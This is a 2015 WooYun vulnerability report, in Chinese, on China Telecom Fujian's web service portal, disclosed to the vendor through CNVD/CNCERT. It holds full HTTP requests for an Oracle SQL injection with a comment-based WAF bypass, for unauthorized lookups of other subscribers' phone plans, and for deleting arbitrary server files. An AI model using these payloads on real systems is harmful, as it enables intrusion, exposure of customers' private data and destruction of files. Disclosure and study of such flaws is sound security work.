当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132424

漏洞标题:某省电信网厅漏洞合集(Oracle注入\越权查询他人手机固话业务\删除任意文件)

相关厂商:中国电信

漏洞作者: 超威蓝猫

提交时间:2015-08-07 17:02

修复时间:2015-09-25 13:50

公开时间:2015-09-25 13:50

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经确认,细节仅向厂商公开
2015-08-21: 细节向核心白帽子及相关领域专家公开
2015-08-31: 细节向普通白帽子公开
2015-09-10: 细节向实习白帽子公开
2015-09-25: 细节向公众公开

简要描述:

某省电信网厅(**.189.cn)漏洞合集(Oracle注入\越权查询他人手机固话业务\删除任意文件)

详细说明:

福建电信网上营业厅 http://fj.189.cn
[1- Oracle注入]
使用福建地区的帐号登录后,点击我的服务-宽带资源查询,输入手机号后点击下一步,可以看到这么一条HTTP请求:

sshot-2015-08-07-[1].png

sshot-2015-08-07-[2].png


这里的 ADDRNAME 参数可注入:

sshot-2015-08-07-[3].png


经测试,WAF会匹配如下关键词

and
 or
select


使用/**/代替其中的空格(%20)即可绕过WAF;该WAF还会将传入的<>转为&lt;&gt;,在部分SQL语句中,可以使用BETWEEN AND等来替代大于小于这些运算符。
我们可以写个脚本来盲注(此处演示仅证明可行性):

POST /ServiceOrderAjax.do HTTP/1.1
Origin: http://fj.189.cn
Content-Length: 181
Accept-Language: zh-CN,zh;q=0.8
Accept-Encoding: gzip,deflate
Host: fj.189.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
X-Requested-With: XMLHttpRequest
Pragma: no-cache
Cache-Control: no-cache
Referer: http://fj.189.cn/service/transaction_new/lan/queryResources.jsp
Content-Type: application/x-www-form-urlencoded
Cookie: 
method=queryAddrByNameInPage&PARENTADDRID=1058224&AREACODE=591&ADDRNAME='/**/AND ascii(substr((select/**/user from dual),1,1)) between 81/**/and 85/**/AND '%'='&FROMCODE=1&ENDCODE=2


传入真时返回地区数据,传入假时返回"未查询到任何结果"

sshot-2015-08-07-[4].png

sshot-2015-08-07-[5].png


通过该方法获取到当前用户名长度为3, ascii码分别为83 82 77, 对应"SRM"。
我们也可以通过XML报错的方式来获取数据:

POST /ServiceOrderAjax.do HTTP/1.1
Origin: http://fj.189.cn
Content-Length: 245
Accept-Language: zh-CN,zh;q=0.8
Accept-Encoding: gzip,deflate
Host: fj.189.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
X-Requested-With: XMLHttpRequest
Pragma: no-cache
Cache-Control: no-cache
Referer: http://fj.189.cn/service/transaction_new/lan/queryResources.jsp
Content-Type: application/x-www-form-urlencoded
Cookie: 
method=queryAddrByNameInPage&PARENTADDRID=1058224&AREACODE=591&ADDRNAME='/**/AND 1=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||(utl_raw.cast_to_raw((SELECT/**/banner from v$version where rownum=1))))) FROM DUAL)/**/AND '%'='&FROMCODE=1&ENDCODE=30


sshot-2015-08-07-[6].png


得到
4F7261636C652044617461626173652031306720456E74657270726973652045646974696F6E2052656C656173652031302E322E302E332E30202D2036346269
解码后为
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - 64bi
(不知道为什么少了一个t,求指导)


sshot-2015-08-07-[7].png


'/**/AND 1=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||((SELECT/**/user from dual where rownum=1)))) FROM DUAL)/**/AND '%'='

可得到当前用户名确实为SRM。

sshot-2015-08-07-[8].png


当前用户权限类型为PLUSTRACE哦 ._.

sshot-2015-08-07-[9].png


[2- 越权查询他人手机固话业务]
直接发包吧.. 实在懒到不想截图了 ._.
注: 只有上面那个oracle注入不需要登录后的cookie,后面两个漏洞需要。
查询任意福建电信手机号的主套餐:

POST /ServiceOrderAjax.do HTTP/1.1
Host: fj.189.cn
Proxy-Connection: keep-alive
Content-Length: 61
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fj.189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Content-Type: application/x-www-form-urlencoded
Referer: http://fj.189.cn/service/transaction_new/tianyiself/prodrevision/zyyw.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: isLogin=logined; fj_citycode=0591; ticket=***此处应打码***; 
method=setEsuringIn&number=18065917777&phonetype=50&city=0591


sshot-2015-08-07-[12].png

sshot-2015-08-07-[13].png


查询任意福建电信手机号已开通的可选包:

POST /service2/actions/Package.action?showPackageAttr= HTTP/1.1
Host: fj.189.cn
Proxy-Connection: keep-alive
Content-Length: 35
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fj.189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Content-Type: application/x-www-form-urlencoded
Referer: http://fj.189.cn/service/transaction_new/tianyiself/prodrevision/zyyw.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: isLogin=logined; fj_citycode=0591; ticket=ticket=***此处应打码***; 
OBJECTNUM=18065917777&OBJECTTYPE=50


sshot-2015-08-07-[10].png

sshot-2015-08-07-[11].png


查询福建电信任意固话号码类型、开通时间、所有业务:

POST /service2/actions/Package.action?showPackageAttr= HTTP/1.1
Host: fj.189.cn
Proxy-Connection: keep-alive
Content-Length: 31
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fj.189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Content-Type: application/x-www-form-urlencoded
Referer: http://fj.189.cn/service/transaction_new/tianyiself/prodrevision/zyyw.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ticket=***此处应有打码***; 
OBJECTNUM=26999999&OBJECTTYPE=1


sshot-2015-08-07-[14].png


(图上第一个开通时间就是电话开户的时间)

sshot-2015-08-07-[15].png

sshot-2015-08-07-[16].png


sshot-2015-08-07-[17].png


[3- 删除任意文件]
在 业务办理-固定电话新装 中上传图片后点击删除:

sshot-2015-08-07-[18].png


POST /ServiceOrderAjax.do HTTP/1.1
Host: fj.189.cn
Proxy-Connection: keep-alive
Content-Length: 116
Accept: */*
Origin: http://fj.189.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Content-Type: application/x-www-form-urlencoded
Referer: http://fj.189.cn/service/transaction_new/phone/telephone_add.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ticket=0wv77gFD21inaa0mqaHr;
method=delfile&saveFileName=1438937023523.jpg&saveFilePath=%2Fservice%2Ftransaction_new%2Flan%2Fuploadfile%2Ffile%2F


我们试试删除服务器上的其他文件:

sshot-2015-08-07-[19].png


天辣!真的删掉了

sshot-2015-08-07-[20].png


sshot-2015-08-07-[21].png

漏洞证明:

如上。

修复方案:

._. 嘻嘻

版权声明:转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-11 13:48

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无